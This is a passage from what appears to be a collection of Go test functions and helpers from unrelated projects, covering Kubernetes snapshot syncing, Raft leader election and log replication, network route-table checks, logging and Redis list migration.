validSecretClass, \"content3-3\", &True, metaTimeNow, nil, nil, false, true),\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"3-4 - ready snapshot misbound to VolumeSnapshotContent\",\n\t\t\tinitialContents: newContentArray(\"content3-4\", \"snapuid3-4-x\", \"snap3-4\", \"sid3-4\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\texpectedContents: newContentArray(\"content3-4\", \"snapuid3-4-x\", \"snap3-4\", \"sid3-4\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap3-4\", \"snapuid3-4\", \"claim3-4\", \"\", validSecretClass, \"content3-4\", &True, metaTimeNow, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap3-4\", \"snapuid3-4\", \"claim3-4\", \"\", validSecretClass, \"content3-4\", &False, metaTimeNow, nil, newVolumeError(\"VolumeSnapshotContent is not bound to the VolumeSnapshot correctly\"), false, true),\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"4-1 - content bound to snapshot, snapshot status missing and rebuilt\",\n\t\t\tinitialContents: newContentArrayWithReadyToUse(\"content2-5\", \"snapuid2-5\", \"snap2-5\", \"sid2-5\", validSecretClass, \"\", \"\", deletionPolicy, nil, &size, &True, false),\n\t\t\texpectedContents: newContentArrayWithReadyToUse(\"content2-5\", \"snapuid2-5\", \"snap2-5\", \"sid2-5\", validSecretClass, \"\", \"\", deletionPolicy, nil, &size, &True, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-5\", \"snapuid2-5\", \"claim2-5\", \"\", validSecretClass, \"\", &False, nil, nil, nil, true, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-5\", \"snapuid2-5\", \"claim2-5\", \"\", validSecretClass, \"content2-5\", &True, nil, getSize(1), nil, false, true),\n\t\t\tinitialClaims: newClaimArray(\"claim2-5\", \"pvc-uid2-5\", \"1Gi\", \"volume2-5\", v1.ClaimBound, &classEmpty),\n\t\t\tinitialVolumes: newVolumeArray(\"volume2-5\", \"pv-uid2-5\", \"pv-handle2-5\", \"1Gi\", \"pvc-uid2-5\", \"claim2-5\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\tinitialSecrets: []*v1.Secret{secret()},\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"4-2 - snapshot and content bound, ReadyToUse in snapshot status missing and rebuilt\",\n\t\t\tinitialContents: newContentArrayWithReadyToUse(\"content2-5\", \"snapuid2-5\", \"snap2-5\", \"sid2-5\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, &True, false),\n\t\t\texpectedContents: newContentArrayWithReadyToUse(\"content2-5\", \"snapuid2-5\", \"snap2-5\", \"sid2-5\", validSecretClass, \"\", \"\", deletionPolicy, nil, nil, &True, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-5\", \"snapuid2-5\", \"claim2-5\", \"\", validSecretClass, \"content2-5\", &False, nil, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-5\", \"snapuid2-5\", \"claim2-5\", \"\", validSecretClass, \"content2-5\", &True, nil, nil, nil, false, true),\n\t\t\tinitialClaims: newClaimArray(\"claim2-5\", \"pvc-uid2-5\", \"1Gi\", \"volume2-5\", v1.ClaimBound, &classEmpty),\n\t\t\tinitialVolumes: newVolumeArray(\"volume2-5\", \"pv-uid2-5\", \"pv-handle2-5\", \"1Gi\", \"pvc-uid2-5\", \"claim2-5\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\tinitialSecrets: []*v1.Secret{secret()},\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t\t{\n\t\t\tname: \"4-3 - content bound to snapshot, fields in snapshot status missing and rebuilt\",\n\t\t\tinitialContents: newContentArrayWithReadyToUse(\"content2-5\", \"snapuid2-5\", \"snap2-5\", \"sid2-5\", validSecretClass, \"\", \"\", deletionPolicy, nil, &size, &True, false),\n\t\t\texpectedContents: newContentArrayWithReadyToUse(\"content2-5\", \"snapuid2-5\", \"snap2-5\", \"sid2-5\", validSecretClass, \"\", \"\", deletionPolicy, nil, &size, &True, false),\n\t\t\tinitialSnapshots: newSnapshotArray(\"snap2-5\", \"snapuid2-5\", \"claim2-5\", \"\", validSecretClass, \"\", &False, nil, nil, nil, false, true),\n\t\t\texpectedSnapshots: newSnapshotArray(\"snap2-5\", \"snapuid2-5\", \"claim2-5\", \"\", validSecretClass, \"content2-5\", &True, nil, getSize(1), nil, false, true),\n\t\t\tinitialClaims: newClaimArray(\"claim2-5\", \"pvc-uid2-5\", \"1Gi\", \"volume2-5\", v1.ClaimBound, &classEmpty),\n\t\t\tinitialVolumes: newVolumeArray(\"volume2-5\", \"pv-uid2-5\", \"pv-handle2-5\", \"1Gi\", \"pvc-uid2-5\", \"claim2-5\", v1.VolumeBound, v1.PersistentVolumeReclaimDelete, classEmpty),\n\t\t\tinitialSecrets: []*v1.Secret{secret()},\n\t\t\terrors: noerrors,\n\t\t\ttest: testSyncSnapshot,\n\t\t},\n\t}\n\n\trunSyncTests(t, tests, snapshotClasses)\n}", "func TestRemoveLeader(t *testing.T) {\n\tdefer leaktest.AfterTest(t)\n\tstopper := stop.NewStopper()\n\tconst clusterSize = 6\n\tconst groupSize = 3\n\tcluster := newTestCluster(nil, clusterSize, stopper, t)\n\tdefer stopper.Stop()\n\n\t// Consume and apply the membership change events.\n\tfor i := 0; i < clusterSize; i++ {\n\t\tgo func(i int) {\n\t\t\tfor {\n\t\t\t\tif e, ok := <-cluster.events[i].MembershipChangeCommitted; ok {\n\t\t\t\t\te.Callback(nil)\n\t\t\t\t} else {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(i)\n\t}\n\n\t// Tick all the clocks in the background to ensure that all the\n\t// necessary elections are triggered.\n\t// TODO(bdarnell): newTestCluster should have an option to use a\n\t// real clock instead of a manual one.\n\tstopper.RunWorker(func() {\n\t\tticker := time.NewTicker(10 * time.Millisecond)\n\t\tdefer ticker.Stop()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-stopper.ShouldStop():\n\t\t\t\treturn\n\t\t\tcase <-ticker.C:\n\t\t\t\tfor _, t := range cluster.tickers {\n\t\t\t\t\tt.NonBlockingTick()\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\n\t// Create a group with three members.\n\tgroupID := roachpb.RangeID(1)\n\tcluster.createGroup(groupID, 0, groupSize)\n\n\t// Move the group one node at a time from the first three nodes to\n\t// the last three. In the process, we necessarily remove the leader\n\t// and trigger at least one new election among the new nodes.\n\tfor i := 0; i < groupSize; i++ {\n\t\tlog.Infof(\"adding node %d\", i+groupSize)\n\t\tch := cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeAddNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i+groupSize].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tlog.Infof(\"removing node %d\", i)\n\t\tch = cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeRemoveNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n}", "func TestSplit(t *testing.T){\r\n\tif !TESTSPLIT{\r\n\t\treturn\r\n\t}\r\n\tcontents := make([]string, 2)\r\n\tcontents[0] = \"duckduck\"\r\n\tcontents[1] = \"go\"\r\n\tmkcl, err := mock.NewCluster(\"input_spec.json\")\r\n\trafts,err := makeMockRafts(mkcl,\"log\", 250, 350) \r\n\tcheckError(t,err, \"While creating mock clusters\")\r\n\ttime.Sleep(5*time.Second)\r\n\trafts[0].Append([]byte(contents[0]))\r\n\ttime.Sleep(5*time.Second)\r\n\tmkcl.Lock()\r\n\tpart1 := []int{1,3}\r\n\tpart2 := []int{2,4}\r\n\trafts[1].smLock.RLock()\r\n\tldrId := rafts[4].LeaderId()\r\n\trafts[1].smLock.RUnlock()\r\n\tfmt.Printf(\"ldrId:%v\\n\", ldrId)\r\n\tif ldrId % 2 == 0{\r\n\t\tpart2 = append(part2, 5)\r\n\t}else{\r\n\t\tpart1 = append(part1, 5)\r\n\t}\r\n\tmkcl.Unlock()\r\n\tmkcl.Partition(part1, part2)\r\n\tdebugRaftTest(fmt.Sprintf(\"Partitions: %v %v\\n\", part1, part2))\r\n\ttime.Sleep(4*time.Second)\r\n\tmkcl.Lock()\r\n\trafts[ldrId-1].Append([]byte(contents[1]))\r\n\tmkcl.Unlock()\r\n\ttime.Sleep(8*time.Second)\r\n\tmkcl.Heal()\r\n\tdebugRaftTest(fmt.Sprintf(\"Healed\\n\"))\r\n\ttime.Sleep(8*time.Second)\r\n\tciarr := []int{0,0,0,0,0}\r\n\tfor cnt:=0;cnt<5;{\r\n\t\tfor idx, node := range rafts {\r\n\t\t\tselect {\r\n\t\t\tcase ci := <-node.CommitChannel():\r\n\t\t\t\tif ci.Err != nil {\r\n\t\t\t\t\tfmt.Fprintln(os.Stderr,ci.Err)\r\n\t\t\t\t}\r\n\t\t\t\t//Testing CommitChannel \r\n\t\t\t\texpect(t,contents[ciarr[idx]],string(ci.Data))\r\n\t\t\t\tciarr[idx] += 1\r\n\t\t\t\tif ciarr[idx] == 2{\r\n\t\t\t\t\tcnt +=1 \r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tfor _, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tnode.Shutdown()\r\n\t}\r\n}", "func TestStatsConnTopoNewLeaderParticipation(t *testing.T) {\n\tconn := &fakeConn{}\n\tstatsConn := NewStatsConn(\"global\", conn)\n\n\t_, _ = statsConn.NewLeaderParticipation(\"\", \"\")\n\ttimingCounts := topoStatsConnTimings.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := timingCounts, int64(1); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n\n\t// error is zero before getting an error\n\terrorCount := topoStatsConnErrors.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := errorCount, int64(0); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n\n\t_, _ = statsConn.NewLeaderParticipation(\"error\", \"\")\n\n\t// error stats gets emitted\n\terrorCount = topoStatsConnErrors.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := errorCount, int64(1); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n}", "func TestCheckPermissionsSyncing(t *testing.T) {\n\tfor _, tt := range []struct {\n\t\tname string\n\t\tinstanceHealth Indicators\n\n\t\twantEmojis []string\n\t\twantErr string\n\t}{{\n\t\tname: \"no jobs\",\n\t\tinstanceHealth: Indicators{\n\t\t\tPermissionsSyncJobs: struct{ Nodes []permissionSyncJob }{\n\t\t\t\tNodes: nil,\n\t\t\t},\n\t\t},\n\t\twantEmojis: []string{output.EmojiWarning},\n\t\twantErr: \"\",\n\t}, {\n\t\tname: \"healthy\",\n\t\tinstanceHealth: Indicators{\n\t\t\tPermissionsSyncJobs: struct{ Nodes []permissionSyncJob }{\n\t\t\t\tNodes: []permissionSyncJob{{\n\t\t\t\t\tFinishedAt: time.Now(),\n\t\t\t\t\tState: \"SUCCESS\",\n\t\t\t\t\tCodeHostStates: []permissionsProviderStatus{{\n\t\t\t\t\t\tProviderType: \"github\",\n\t\t\t\t\t\tProviderID: \"https://github.com/\",\n\t\t\t\t\t\tStatus: \"SUCCESS\",\n\t\t\t\t\t}},\n\t\t\t\t}},\n\t\t\t},\n\t\t},\n\t\twantEmojis: []string{output.EmojiSuccess},\n\t\twantErr: \"\",\n\t}, {\n\t\tname: \"unhealthy\",\n\t\tinstanceHealth: Indicators{\n\t\t\tPermissionsSyncJobs: struct{ Nodes []permissionSyncJob }{\n\t\t\t\tNodes: []permissionSyncJob{{\n\t\t\t\t\tFinishedAt: time.Now(),\n\t\t\t\t\tState: \"ERROR\",\n\t\t\t\t\tFailureMessage: \"oh no!\",\n\t\t\t\t\tCodeHostStates: []permissionsProviderStatus{{\n\t\t\t\t\t\tProviderType: \"github\",\n\t\t\t\t\t\tProviderID: \"https://github.com/\",\n\t\t\t\t\t\tStatus: \"ERROR\",\n\t\t\t\t\t}},\n\t\t\t\t}},\n\t\t\t},\n\t\t},\n\t\twantEmojis: []string{output.EmojiFailure},\n\t\twantErr: \"permissions sync errors\",\n\t}} {\n\t\tt.Run(tt.name, func(t *testing.T) {\n\t\t\tvar out bytes.Buffer\n\t\t\terr := checkPermissionsSyncing(output.NewOutput(io.MultiWriter(os.Stderr, &out), output.OutputOpts{}), time.Hour, tt.instanceHealth)\n\t\t\tif tt.wantErr == \"\" {\n\t\t\t\tassert.NoError(t, err)\n\t\t\t} else {\n\t\t\t\trequire.Error(t, err)\n\t\t\t\tassert.Contains(t, err.Error(), tt.wantErr)\n\t\t\t}\n\t\t\tif len(tt.wantEmojis) > 0 {\n\t\t\t\tdata := out.String()\n\t\t\t\tfor _, emoji := range tt.wantEmojis {\n\t\t\t\t\tassert.Contains(t, data, emoji)\n\t\t\t\t}\n\t\t\t}\n\t\t})\n\t}\n}", "func TestRouteTableHistory(t *testing.T) {\n\ttest := &Test{\n\t\tsetupCmds: []Cmd{\n\t\t\t{\"ovs-vsctl add-br br-rth\", true},\n\t\t\t{\"ip netns add rth-vm1\", true},\n\t\t\t{\"ip link add rth-vm1-eth0 type veth peer name rth-eth-src netns rth-vm1\", true},\n\t\t\t{\"ip link set rth-vm1-eth0 up\", true},\n\t\t\t{\"ip netns exec rth-vm1 ip link set rth-eth-src up\", true},\n\t\t\t{\"ip netns exec rth-vm1 ip address add 124.65.75.42/24 dev rth-eth-src\", true},\n\t\t\t{\"ovs-vsctl add-port br-rth rth-vm1-eth0\", true},\n\t\t\t{\"ip netns add rth-vm2\", true},\n\t\t\t{\"ip link add rth-vm2-eth0 type veth peer name rth-eth-dst netns rth-vm2\", true},\n\t\t\t{\"ip link set rth-vm2-eth0 up\", true},\n\t\t\t{\"ip netns exec rth-vm2 ip link set rth-eth-dst up\", true},\n\t\t\t{\"ip netns exec rth-vm2 ip address add 124.65.76.43/24 dev rth-eth-dst\", true},\n\t\t\t{\"ovs-vsctl add-port br-rth rth-vm2-eth0\", true},\n\t\t\t{\"sleep 5\", false},\n\t\t\t{\"ip netns exec rth-vm1 ip route add 124.65.75.0/24 via 124.65.75.42 table 2\", true},\n\t\t},\n\n\t\ttearDownCmds: []Cmd{\n\t\t\t{\"ovs-vsctl del-br br-rth\", true},\n\t\t\t{\"ip link del rth-vm1-eth0\", true},\n\t\t\t{\"ip netns del rth-vm1\", true},\n\t\t\t{\"ip link del rth-vm2-eth0\", true},\n\t\t\t{\"ip netns del rth-vm2\", true},\n\t\t},\n\n\t\tmode: OneShot,\n\n\t\tchecks: []CheckFunction{\n\t\t\tfunc(c *CheckContext) error {\n\t\t\t\tprefix := g.G.Context(\"NOW\")\n\t\t\t\tnode, err := c.gh.GetNode(prefix.V().Has(\"IPV4\", \"124.65.75.42/24\"))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn fmt.Errorf(\"Failed to find a node with IP 124.65.75.42/24\")\n\t\t\t\t}\n\n\t\t\t\troutingTables, ok := node.Metadata[\"RoutingTables\"].(*topology.RoutingTables)\n\t\t\t\tif !ok {\n\t\t\t\t\treturn fmt.Errorf(\"Wrong metadata type for RoutingTables: %+v\", reflect.TypeOf(node.Metadata[\"RoutingTables\"]))\n\t\t\t\t}\n\n\t\t\t\tfoundNewTable := false\n\t\t\t\tfor _, rt := range *routingTables {\n\t\t\t\t\tif rt.ID == 2 {\n\t\t\t\t\t\tfoundNewTable = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif !foundNewTable {\n\t\t\t\t\treturn fmt.Errorf(\"Failed to get added Route from history\")\n\t\t\t\t}\n\t\t\t\treturn nil\n\t\t\t},\n\t\t},\n\t}\n\tRunTest(t, test)\n}", "func TestLog(t *testing.T) {\n\tt.Skip()\n\n\tfmt.Printf(\"TestLog(): start\\n\")\n\n\tlogrus.Printf(\"bucket_test.go: TestLog(): printing from logrus before format\")\n\n\tlog := logrus.New()\n\tlog.Formatter = &logrus.JSONFormatter{}\n\tlog.Printf(\"bucket_test.go: TestLog(): printing JSONFormatter\")\n\n\tlog.Formatter = &logrus.TextFormatter{ForceColors: true}\n\tlog.Infof(\"bucket_test.go: TestLog(): printing TextFormatter\")\n\t// will not be displayed\n\tlog.Debugf(\"bucket_test.go: TestLog(): no debug level\")\n\t// will be displayed\n\tlog.SetLevel(logrus.DebugLevel)\n\tlog.Debugf(\"bucket_test.go: TestLog(): with debug level\")\n\t\t\n\tlmont := logmont.New()\n\tlmont.Printf(\"bucket_test.go: TestLog(): lmont -> default printing\")\n\tlmont.Formatter = &logrus.TextFormatter{ForceColors: true}\n\tlmont.Printf(\"bucket_test.go: TestLog(): lmont -> force colors\")\n\tlmont.Printf(\"bucket_test.go: TestLog(): lmont -> PRINT s=%s\", \"print_string\")\n\tlmont.Infof(\"bucket_test.go: TestLog(): lmont -> INFO s=%s\", \"info_string\")\n\tlmont.Warnf(\"bucket_test.go: TestLog(): lmont -> WARN s=%s\", \"warn_string\")\n\tlmont.Errorf(\"bucket_test.go: TestLog(): lmont -> ERROR s=%s\", \"error_string\")\n\n\tlmont.SetLevel(logrus.DebugLevel)\n\tlmont.Debugf(\"bucket_test.go: TestLog(): lmont -> DEBUG s=%s\", \"debug_string\")\n\n\tlmont.SetTrace(true)\n\tlmont.Tracef(\"bucket_test.go: TestLog(): lmont -> TRACE a1=%s, a2=%s\\n\", \"args1\", \"args2\")\n\tlmont.Tracef(\"bucket_test.go: TestLog(): lmont -> TRACE no argsstring\")\n\n\t// should not display\n\tlmont.SetTrace(false)\n\tlmont.Tracef(\"bucket_test.go: TestLog(): lmont -> TRACE s=%s\\n\", \"don't snow\")\n\n\tbktLog := bucket.New()\n\tlmont.Infof(\"bucket_test.go: TestLog(): bktLog = %+v\", bktLog)\n\n\t// Default settings for the default logmont\n\tbktLog.Logit()\n\n\t// Package level to keep it simple for now\n\tbucket.SetLogger(lmont)\n\n\t// Info and Debug, not Trace\n\tbktLog.Logit()\n\n\t// Info, Debug, Trace\n\tlmont.SetTrace(true)\n\tbktLog.Logit()\n\t\n\tfmt.Printf(\"TestLog(): finish\\n\")\n}", "func (r *Raft) LogRepair(response AppendEntriesResponse) {\n\tid := response.followerId\n\t//fmt.Println(\"In log repair for \", id)\n\tfailedIndex := r.myMetaData.nextIndexMap[id]\n\tvar nextIndex int\n\t//fmt.Println(\"Failed index is:\", failedIndex)\n\tif failedIndex != 0 {\n\t\tnextIndex = failedIndex - 1 //decrementing follower's nextIndex\n\n\t} else { //if nextIndex is 0 means, follower doesn't have first entry (of leader's log),so decrementing should not be done, so retry the same entry again!\n\t\tnextIndex = failedIndex\n\t}\n\t//Added--3:38-23 march\n\tr.myMetaData.nextIndexMap[id] = nextIndex\n\t//fmt.Println(\"I am\", response.followerId, \"My Old and new NI are\", failedIndex, nextIndex)\n\treturn\n}", "func TestLogStoreStreamLogs(t *testing.T) {\n\t// require.Fail(t, \"test me\")\n}", "func (rf *Raft) FollowerCommit(leaderCommit int, m int) {\n\t//fmt.Printf(\"hi:%v \\n\", p)\n\tp := rf.commitIndex\n\tif leaderCommit > rf.commitIndex {\n\t\tif leaderCommit < m {\n\t\t\trf.commitIndex = leaderCommit\n\t\t} else {\n\t\t\trf.commitIndex = m\n\t\t}\n\t}else{\n\t\t//fmt.Printf(\"leaderCommit:%v rf.commitIndex:%v \\n\", leaderCommit, rf.commitIndex)\n\t}\n\tfor p++; p <= rf.commitIndex; p++ {\n\t\trf.applyCh <- ApplyMsg{Index:p, Command:rf.log[p-rf.log[0].Index].Command}\n\t\trf.lastApplied = p\n\t}\n\t//fmt.Printf(\"done \\n\")\n\t//fmt.Printf(\"server %v term %v role %v last append %v \\n\", rf.me, rf.currentTerm, rf.role, rf.lastApplied)\n}", "func TestLeaderElectionInOneRoundRPC(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tvotes map[uint64]bool\n\t\tstate StateType\n\t}{\n\t\t// win the election when receiving votes from a majority of the servers\n\t\t{1, map[uint64]bool{}, StateLeader},\n\t\t{3, map[uint64]bool{2: true, 3: true}, StateLeader},\n\t\t{3, map[uint64]bool{2: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true}, StateLeader},\n\n\t\t// return to follower state if it receives vote denial from a majority\n\t\t{3, map[uint64]bool{2: false, 3: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: false, 3: false, 4: false, 5: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: true, 3: false, 4: false, 5: false}, StateFollower},\n\n\t\t// stay in candidate if it does not obtain the majority\n\t\t{3, map[uint64]bool{}, StateCandidate},\n\t\t{5, map[uint64]bool{2: true}, StateCandidate},\n\t\t{5, map[uint64]bool{2: false, 3: false}, StateCandidate},\n\t\t{5, map[uint64]bool{}, StateCandidate},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tfor id, vote := range tt.votes {\n\t\t\tr.Step(pb.Message{From: id, To: 1, Term: r.Term, Type: pb.MsgVoteResp, Reject: !vote})\n\t\t}\n\n\t\tif r.state != tt.state {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, r.state, tt.state)\n\t\t}\n\t\tif g := r.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, 1)\n\t\t}\n\t}\n}", "func TestRaftSingleNodeVerifyRead(t *testing.T) {\n\tID1 := \"1\"\n\tclusterPrefix := \"TestRaftSingleNodeVerifyRead\"\n\n\t// Create the Raft node.\n\tfsm := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn := testCreateRaftNode(cfg, newStorage())\n\tn.Start(fsm)\n\tn.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes leader.\n\t<-fsm.leaderCh\n\tpending := n.VerifyRead()\n\t<-pending.Done\n\tif pending.Err != nil {\n\t\tlog.Fatalf(\"Failed to do VerifyRead in single-node Raft cluster.\")\n\t}\n}", "func (rf *Raft) replicateLog(server, followerNext, leaderLatest, leaderCommit int, successCh chan<- ReplicateState) {\n\t\tvar args AppendEntriesArgs\n\t\tvar reply AppendEntriesReply\n\t\targs.Me = rf.me\n\t\targs.Term = rf.currentTerm\n\t\targs.PrevIndex = followerNext - 1\n\t\targs.PrevTerm = rf.log[args.PrevIndex].Term\n\t\targs.CommitIndex = leaderCommit\n\n\t\t// New log to replicated\n\t\tif leaderLatest >= followerNext {\n\t\t\targs.Logs = rf.log[followerNext : leaderLatest+1]\n\t\t}\n\n\t\t//log.Println(\"Raft \", rf.me, \" replicate log to server \", server, \" \", args)\n\t\tok := rf.sendAppendEntries(server, &args, &reply)\n\t\tstate := ReplicateState{Ok: false, Result: Failed, Server: server}\n\n\t\tif !ok {\n\t\t\tstate.Ok = false\n\n\t\t} else if !reply.Ok && rf.currentTerm >= reply.Term {\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = LogInconsistent\n\t\t\tstate.Term = reply.Term\n\n\t\t} else if !reply.Ok && rf.currentTerm < reply.Term {\n\t\t\t// Follower has high term, do nothing and just wait new leader's heartbeat\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = OldTerm\n\t\t\tstate.Term = reply.Term\n\n\t\t} else {\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = Success\n\t\t\tstate.Term = reply.Term\n\t\t\tstate.LatestIndex = leaderLatest\n\t\t\tstate.Commit = reply.CommitIndex\n\t\t\t//log.Println(\"Rf \", rf.me, \" replicate to \", server, \" success: \", reply)\n\t\t}\n\n\t\tsuccessCh <- state\n}", "func TestLMigrate(t *testing.T) {\n\tvar m = newMigrator()\n\n\tm.flushdst = true\n\tm.flushsrc = true\n\n\t// Just use a separate database on the single redis instance.\n\tm.dstdb = 1\n\tm.initRedis()\n\n\ttestkey := \"list1\"\n\ttestLength := 40\n\tfor i := 0; i < testLength; i++ {\n\t\terr := sclient.RPush(testkey, fmt.Sprintf(\"value-%d\", i)).Err()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}\n\tcmdKey = testkey\n\tvar wg sync.WaitGroup\n\tvar lm = &lmigrator{key: cmdKey}\n\tlcount = 7\n\n\tlm.migrate(&wg, dummyProgressPool)\n\n\tlogger.Debugf(\"Migrated test list...%v\", dclient.LLen(testkey).Val())\n\n\tassert.Equal(t, int64(testLength), dclient.LLen(testkey).Val())\n\tlogger.Debug(\"Indexing through all values...\")\n\tfor i := 0; i < testLength; i++ {\n\t\tget := dclient.LIndex(testkey, int64(i))\n\t\tval, err := get.Result()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\n\t\tassert.Equal(t, fmt.Sprintf(\"value-%d\", i), val)\n\t}\n\n\tsclient.FlushAll()\n\tdclient.FlushAll()\n}", "func TestRaftSingleNodeCommit(t *testing.T) {\n\tID1 := \"1\"\n\tclusterPrefix := \"TestRaftSingleNodeCommit\"\n\n\t// Create the Raft node.\n\tfsm := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn := testCreateRaftNode(cfg, newStorage())\n\tn.Start(fsm)\n\tn.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes leader.\n\t<-fsm.leaderCh\n\n\t// Propose 10 commands.\n\tfor i := 0; i < 10; i++ {\n\t\tn.Propose([]byte(\"I'm data-\" + strconv.Itoa(i)))\n\t}\n\n\t// These 10 proposed entries should be applied eventually.\n\tfor i := 0; i < 10; i++ {\n\t\t<-fsm.appliedCh\n\t}\n}", "func TestPreVoteWithSplitVote(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// simulate leader down. followers start split vote.\n\tnt.isolate(1)\n\tnt.send([]pb.Message{\n\t\t{From: 2, To: 2, Type: pb.MsgHup},\n\t\t{From: 3, To: 3, Type: pb.MsgHup},\n\t}...)\n\n\t// check whether the term values are expected\n\t// n2.Term == 3\n\t// n3.Term == 3\n\tsm := nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\t// check state\n\t// n2 == candidate\n\t// n3 == candidate\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\n\t// node 2 election timeout first\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// n2.Term == 4\n\t// n3.Term == 4\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 4)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 4)\n\t}\n\n\t// check state\n\t// n2 == leader\n\t// n3 == follower\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader 